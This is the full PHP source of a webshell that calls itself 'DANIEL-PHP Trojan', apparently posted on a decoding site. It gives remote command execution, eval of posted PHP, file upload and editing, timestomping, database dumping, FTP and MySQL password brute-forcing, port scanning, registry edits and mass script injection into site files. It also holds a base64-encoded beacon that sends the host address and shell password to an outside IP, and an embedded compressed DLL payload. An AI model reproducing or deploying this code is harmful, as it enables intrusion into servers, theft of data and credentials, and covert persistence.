                while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue;  find("$path/$f");} 
                closedir($tempdir); 
            }else{ 
                if(filesize("$path")){ 
                    $fp=fopen("$path","r"); 
                    $msg=fread($fp, filesize("$path")); 
                    fclose($fp); 
                    if(strpos($msg, $oldkey) !== false) { 
                        $dir = dirname($path); 
                        $file = basename($path); 
                        if($type=="list"){ 
                            $mymsg = explode("\n",$msg); 
                            $long = count($mymsg); 
                            $tmp = explode($oldkey,$msg); 
                            $tmp = explode("\n",$tmp[0]); 
                            $first = count($tmp); 
                            $end = "[".$first."/".$long."]"; 
                        } 
                        if($type2=="getpath"){ 
                            $get = explode($oldkey,$msg); 
                            $get = strlen($get[0]); 
                            if(isset($beline)){ 
                                $get = $get-$beline; 
                            } 
                            $getpath = htmlspecialchars(substr($msg, $get, $endline)); 
                            $getpath = "title = \"".$getpath."\""; 
                        } 
                        echo "<span class=\"redfont\" $getpath>:$dir/$file</span> |<a href=\"?action=editfile&dir=$dir&editfile=$file\" target=\"_blank\">view+edit</a> | $end <br>"; 
                    } 
                } 
            } 
        } 
?> 

Did this file decode correctly?

Original Code

<?php

/**
 *  ,,
 * @author 
 */
header("Content-type:text/html; charset=utf-8");
$admin['pass']  = "admin";  //
$notice = "<FONT color=#ff3300></font>";  //
$mytitle = "DANIEL-PHP Trojan...";
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
$admin['check'] = "1";
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
$admin['jumpsecond'] = "1";
$alexa = "yes";
$admin['ftpport'] = "21";
$retime = "no";
$cmd = "cmd.exe";
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8xOTIuMTY4LjE4OS41Ny9hYmMvdGVzdC93ZWJzaGVsbC9kYXRhLnBocD91PQ==');

$copyurll = base64_decode('Jz48L3NjcmlwdD4=');

$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style=\"font-size: 12px; font-family: Verdana\">......<p><a href=\"".$self."\"> &gt;&gt;&gt;</a></span>";exit;}
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
$mixdll = "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";

function shelL($command){
    global $windows,$disablefunctions;
    $exec = '';$output= '';
    $dep[]=array('pipe','r');$dep[]=array('pipe','w');
    if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
    elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
    elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
    elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
    elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
    elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
    elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
    return $exec;
}
// PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() ,&lt;PHP&gt;";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "";
echo"$user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit;
}
if($action=="mysqldown"){
    $link=@mysql_connect($host,$user,$password);
    if (!$link) {
        $downtmp = ': ' . mysql_error();
    }else{
        $query="select load_file('".$filename."');";
        $result = @mysql_query($query, $link);
        if(!$result){
            $downtmp = "file<br>".mysql_error();
        }else{
            while ($row = mysql_fetch_array($result)) {
                $filename = basename($filename);
                if($rardown=="yes"){
                    $zip = NEW Zip;
                    $zipfiles[]=Array("$filename",$row[0]);
                    $zip->Add($zipfiles,1);
                    $code = $zip->get_file();
                    $filename = "".$filename.".rar";
                }else{
                    $code = $row[0];
                }
                header("Content-type: application/octet-stream");
                header("Accept-Ranges: bytes");
                header("Accept-Length: ".strlen($code));
                header("Content-Disposition: attachment;filename=$filename");
                echo($code);
                exit;
            }
        }
    }
}
// 
if (isset($_POST['url'])) {
    $proxycontents = @file_get_contents($_POST['url']);
    echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b> URL </b></p></center></body>";
    exit;
}
// 
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script>alert('!')</script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 
if ($_POST['backuptype'] == 'download') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("");
    @mysql_select_db($dbname) or die("");
    $table = array_flip($_POST['table']);
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : ": ".mysql_error();

    $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata.= sqldumptable($currow[0]);
            $mysqldata.= $mysqldata."\r\n";
        }
    }
    mysql_close();
    exit;
}

// 
$pathname=str_replace('\\','/',dirname(__FILE__));
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]);

// 
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir=$_GET['dir'];
    $nowpath = getPath($pathname, $dir);
}

// 
$dir_writeable = (dir_writeable($nowpath)) ? "" : "";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"></a>" : "";

$tb = new FORMS();

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
body,td {
    font-size: 12px;
    background-color: #000000;
    color: #eee;
    margin: 1px;
    margin-left: 1px;
    SCROLLBAR-FACE-COLOR: #232323;
    SCROLLBAR-HIGHLIGHT-COLOR: #232323;
    SCROLLBAR-SHADOW-COLOR: #383838;
    SCROLLBAR-DARKSHADOW-COLOR: #383838;
    SCROLLBAR-3DLIGHT-COLOR: #232323;
    SCROLLBAR-ARROW-COLOR: #FFFFFF;
    SCROLLBAR-TRACK-COLOR: #383838;
}

a {
    color: #ddd;
    text-decoration: none;
}

a:hover {
    color: red;
    background: #000
}

.smlfont {
    font-family: "Verdana", "Tahoma", "";
    font-size: "11px";
}

.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}

.redfont {
    COLOR: "#CA0000";
}

.top {
    BACKGROUND-COLOR: "#CCCCCC"
}

.firstalt {
    BACKGROUND-COLOR: "#EFEFEF"
}

.secondalt {
    BACKGROUND-COLOR: "#F5F5F5"
}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
    for (var i=0;i<form.elements.length;i++) {
        var e = form.elements[i];
        if (e.name != 'chkall')
        e.checked = form.chkall.checked; }}
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}}
</SCRIPT>
</head>
<title><?php echo"$mytitle"?></title>
<body style="table-layout: fixed; word-break: break-all onmouseover ="
    window.status='modifier:  ,,' ;return
    true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<center>
<?php
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Ymd h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?dir='.$dirpath.'"></a> | <a href="?action=dir">Shell</a> | <a href="?action=phpenv"></a> | <a href="?action=proxy"></a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=crack"></a> | <a href="?action=mix">mix.dll</a> | <a href="?action=logout"></a>');
$tb->tdbody('<a href="?action=plgm"></a> | <a href="?action=downloads">Http</a> | <a href="?action=search&dir='.$dir.'"></a> | <a href="?action=eval">php</a> | <a href="?action=sql">SQL</a> | <a href="?action=mysqlfun">FuncShell</a> | <a href="?action=sqlbak">MySQL</a> | <a href="?action=SUExp">Serv-U</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?php
$tb->headerform(array('method'=>'GET','content'=>'<p>: '.$pathname.'<br>('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','','','submit').' '));

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>': '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>': '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','','','submit')));

$tb->headerform(array('content'=>': '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*=====================   =====================*/
echo "<p><b>\n";
// 
if (!empty($delfile)) {
    if (file_exists($delfile)) {
        echo (@unlink($delfile)) ? $delfile." !" : "!";
    } else {
        echo basename($delfile)." !";
    }
}

// 
elseif (!empty($deldir)) {
    $deldirs="$dir/$deldir";
    if (!file_exists("$deldirs")) {
        echo "$deldir !";
    } else {
        echo (deltree($deldirs)) ? "!" : "!";
    }
}

// 
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
    if (!empty($newdirectory)) {
        $mkdirs="$dir/$newdirectory";
        if (file_exists("$mkdirs")) {
            echo "!";
        } else {
            echo (@mkdir("$mkdirs",0777)) ? "!" : "!";
            @chmod("$mkdirs",0777);
        }
    }
}

// 
elseif ($doupfile) {
    echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "!" : "!";
}
elseif($action=="mysqlup"){
    $filename = $_FILES['upfile']['tmp_name'];
    if(!$filename) {
        echo"";
    }else{
        $shell = file_get_contents($filename);
        $mysql = bin2hex($shell);
        if(!$upname) $upname = $_FILES['upfile']['name'];
        $shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
        $link=@mysql_connect($host,$user,$password);
        if(!$link){
            echo "".mysql_error();
        }else{
            $result = mysql_query($shell, $link);
            if($result){
                echo".".$host.",".$uppath."/".$upname."..";
            }else{
                echo" :".mysql_error();
            }
        }
    }

}
elseif($action=="mysqldown"){
    if(!empty($downtmp)) echo $downtmp;
}
// 
elseif ($_POST['do'] == 'doeditfile') {
    if (!empty($_POST['editfilename'])) {
        if(!file_exists($editfilename)) unset($retime);
        if($time==$now) $time = @filemtime($editfilename);
        $time2 = @date("Y-m-d H:i:s",$time);
        $filename="$editfilename";
        @$fp=fopen("$filename","w");
        if($_POST['change']=="yes"){
            $filecontent = "?".">".$_POST['filecontent']."<?";
            $filecontent = gzdeflate($filecontent);
            $filecontent = base64_encode($filecontent);
            $filecontent = "<?php\n/*\n!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
        }else{
            $filecontent = $_POST['filecontent'];
        }
        echo $msg=@fwrite($fp,$filecontent) ? "!" : "!";
        @fclose($fp);
        if($retime=="yes"){
            echo"&nbsp;:";
            echo $msg=@touch($filename,$time) ? "".$time2."!" : "!";
        }
    } else {
        echo "!";
    }
}
//
elseif ($_POST['do'] == 'downloads') {
    $contents = @file_get_contents($_POST['durl']);
    if(!$contents){
        echo"";
    }
    elseif(file_exists($path)){
        echo"".$path."";
    }else{
        $fp = @fopen($path,"w");
        echo $msg=@fwrite($fp,$contents) ? "!" : "!";
        @fclose($fp);
    }
}
elseif($_POST['action']=="mix"){
    if(!file_exists($_POST['mixto'])){
        $tmp = base64_decode($mixdll);
        $tmp = gzinflate($tmp);
        $fp = fopen($_POST['mixto'],"w");
        echo $msg=@fwrite($fp,$tmp) ? "!" : "!";
        fclose($fp);
    }else{
        echo"".$_POST['mixto']."~";
    }
}
// 
elseif ($_POST['do'] == 'editfileperm') {
    if (!empty($_POST['fileperm'])) {
        $fileperm=base_convert($_POST['fileperm'],8,10);
        echo (@chmod($dir."/".$file,$fileperm)) ? "!" : "!";
        echo "  ".$file." : ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
    } else {
        echo "!";
    }
}

// 
elseif ($_POST['do'] == 'rename') {
    if (!empty($_POST['newname'])) {
        $newname=$_POST['dir']."/".$_POST['newname'];
        if (@file_exists($newname)) {
            echo "".$_POST['newname']." ,!";
        } else {
            echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])."  ".$_POST['newname']." !" : "!";
        }
    } else {
        echo "!";
    }
}
elseif ($_POST['do'] == 'search') {
    if(!empty($oldkey)){
        echo"<span class=\"redfont\">:[".$oldkey."],:";
        if($type2 == "getpath"){
            echo".";
        }
        echo"</span><br><hr width=\"775\" noshade>";
        find($path);
    }else{
        echo"???";
    }
}
elseif ($_GET['action']=='plgmok') {
    dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
    $action = '?action=plgmok';
    $gm = "<script src=http://127.0.0.1></script>";
    $tb->tableheader();
    $tb->formheader($action,'');
    $tb->tdbody('php','center');
    $tb->tdbody(': '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','').'<br>'.$tb->makeinput('submit','','','submit'),'center','1','35');
    echo "</form>";
    $tb->tablefooter();
}//end plgm
// 
elseif ($_POST['do'] == 'domodtime') {
    if (!@file_exists($_POST['curfile'])) {
        echo "!";
    } else {
        if (!@file_exists($_POST['tarfile'])) {
            echo "!";
        } else {
            $time=@filemtime($_POST['tarfile']);
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])."  ".date("Y-m-d H:i:s",$time)." !" : "!";
        }
    }
}

// 
elseif ($_POST['do'] == 'modmytime') {
    if (!@file_exists($_POST['curfile'])) {
        echo "!";
    } else {
        $year=$_POST['year'];
        $month=$_POST['month'];
        $data=$_POST['data'];
        $hour=$_POST['hour'];
        $minute=$_POST['minute'];
        $second=$_POST['second'];
        if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
            $time=strtotime("$data $month $year $hour:$minute:$second");
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])."  ".date("Y-m-d H:i:s",$time)." !" : "!";
        }
    }
}
elseif($do =='port'){
    $tmp = explode(",",$port);
    $count = count($tmp);
    for($i=$first;$i<$count;$i++){
        $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
        if($fp) echo"".$host."".$tmp[$i]."<br>";
    }
}
/*
 
 */
elseif ($do == 'crack') {//
    if(@file_exists($passfile)){
        $tmp = file($passfile);
        $count = count($tmp);
        if(empty($onetime)){
            $onetime = $count;
            $turn="1";
        }else{
            $nowturn = $turn+1;
            $now = $turn*$onetime;
            $tt = intval(($count/$onetime)+1);
        }
        if($turn>$tt or $onetime>$count){
            echo"~";
        }else{
            $first = $onetime*($turn-1);
            for($i=$first;$i<$now;$i++){
                if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
                else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
                if($sa)
                {
                    $t = "".$user."".$tmp[$i]."";
                }
            }
            if(!$t){
                echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style=\"font-size: 12px; font-family: Verdana\"><a href=\"".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">".$count."".$first."".$now."".$admin[jumpsecond]."".$onetime.". &gt;&gt;&gt;</a><br>".$type."".$tt."".$turn."</span>";
            }
            else {
                echo"$t";
            }
        }
    }else{
        echo"";
    }
}
elseif($do =='port'){
    if(!eregi("-",$port)){
        $tmp = explode(",",$port);
        $count = count($tmp);
        $first = "1";
    }else{
        $tmp = explode("-",$port);
        $first = $tmp[0];
        $count = $tmp[1];

    }
    for($i=$first;$i<$count;$i++){
        if(!eregi("-",$port)){
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
            if($fp) echo"".$host."".$tmp[$i]."<br>";
        }else{
            $fp = @fsockopen($host, $i, $errno, $errstr, 1);
            if($fp) echo"".$host."".$i."<br>";
        }
    }

}
// MYSQL
elseif ($connect) {
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
        echo "!";
        mysql_close();
    } else {
        echo mysql_error();
    }
}

// SQL
elseif ($_POST['do'] == 'query') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("");
    @mysql_select_db($dbname) or die("");
    $result = @mysql_query($_POST['sql_query']);
    echo ($result) ? "SQL!" : ": ".mysql_error();
    mysql_close();
}

// 
elseif ($_POST['do'] == 'backupmysql') {
    if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
        echo "!";
    } else {
        if ($_POST['backuptype'] == 'server') {
            @mysql_connect($servername,$dbusername,$dbpassword) or die("");
            @mysql_select_db($dbname) or die("");
            $table = array_flip($_POST['table']);
            $filehandle = @fopen($path,"w");
            if ($filehandle) {
                $result = mysql_query("SHOW tables");
                echo ($result) ? NULL : ": ".mysql_error();
                while ($currow = mysql_fetch_array($result)) {
                    if (isset($table[$currow[0]])) {
                        sqldumptable($currow[0], $filehandle);
                        fwrite($filehandle,"\n\n\n");
                    }
                }
                fclose($filehandle);
                echo " <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
                mysql_close();
            } else {
                echo ",!";
            }
        }
    }
}
elseif($downrar) {
    if (!empty($dl)) {
        if(eregi("unzipto:",$localfile)){
            $path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
            $zip = new Zip;
            $zipfile=$dir."/".$dl[0];
            $array=$zip->get_list($zipfile);
            $count=count($array);
            $f=0;
            $d=0;
            for($i=0;$i<$count;$i++) {
                if($array[$i][folder]==0) {
                    if($zip->Extract($zipfile,$path,$i)>0) $f++;
                }
                else $d++;
            }
            if($i==$f+$d) echo "$dl[0] ".$path."<br>($f  $d )";
            elseif($f==0) echo "$dl[0] ".$path."";
            else echo "$dl[0] <br>( $f  $d )";
        }else{
            $zipfile="";
            $zip = new Zip;
            for($k=0;isset($dl[$k]);$k++)
            {
                $zipfile=$dir."/".$dl[$k];
                if(is_dir($zipfile))
                {
                    unset($zipfilearray);
                    addziparray($dl[$k]);
                    for($i=0;$zipfilearray[$i];$i++)
                    {
                        $filename=$zipfilearray[$i];
                        $filesize=@filesize($dir."/".$zipfilearray[$i]);
                        $fp=@fopen($dir."/".$filename,rb);
                        $zipfiles[]=Array($filename,@fread($fp,$filesize));
                        @fclose($fp);
                    }
                }
                else
                {
                    $filename=$dl[$k];
                    $filesize=@filesize($zipfile);
                    $fp=@fopen($zipfile,rb);
                    $zipfiles[]=Array($filename,@fread($fp,$filesize));
                    @fclose($fp);
                }
            }
            $zip->Add($zipfiles,1);
            $code = $zip->get_file();
            $ck = "_QQ44997_".date("Y-m-d",time())."";
            if(empty($localfile)){
                header("Content-type: application/octet-stream");
                header("Accept-Ranges: bytes");
                header("Accept-Length: ".strlen($code));
                header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
                echo $code;
                exit;
            }else{
                $fp = @fopen("".$dir."/".$localfile."","w");
                echo $msg=@fwrite($fp,$code) ? "".$dir."/".$localfile."!" : "".$dir."!";
                @fclose($fp);
            }
        }
    } else {
        echo "!";
    }
}
// Shell.Application 
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
//  $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
    echo ($a=='0') ? "!" : "!";
}
// PHP
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
    echo " ".$_POST['phpvarname']." : ".getphpcfg($_POST['phpvarname'])."";
}
// 
elseif(($regread) AND !empty($_POST['readregname'])) {
//  $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    var_dump(@$shell->RegRead($_POST['readregname']));
}

// 
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
//  $shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
    echo ($a=='0') ? "!" : " ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." !";
}
// 
elseif(($regdelete) AND !empty($_POST['delregname'])) {
//  $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $a = @$shell->RegDelete($_POST['delregname']);
    echo ($a=='0') ? "!" : " ".$_POST['delregname']." !";
}
else {
    echo "$notice";
    echo "<a href=\"?dir=C:/Program%20Files/\">Program</a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users//\"></a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href=\"?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | ";
    for ($i=66;$i<=90;$i++){$drive= chr($i).':';
    if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href=\"?dir=$drive/\">$drive\\</a>";}
    }

}

echo "</b></p>\n";
/*=====================   =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
    $tb->tableheader();
    ?>
<tr bgcolor="#cccccc">
    <td align="center" nowrap width="27%"><b></b></td>
    <td align="center" nowrap width="16%"><b></b></td>
    <td align="center" nowrap width="16%"><b></b></td>
    <td align="center" nowrap width="11%"><b></b></td>
    <td align="center" nowrap width="6%"><b></b></td>
    <td align="center" nowrap width="24%"><b></b></td>
</tr>
<FORM action="" method="POST">
<?php
// 
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="1"){
        if($file!=".." && $file!=".")   {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));

            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
            echo "<tr class=".getrowbg().">\n";
            echo "  <td style=\"padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=search&dir=".$filepath."\">Search</a></td>\n";
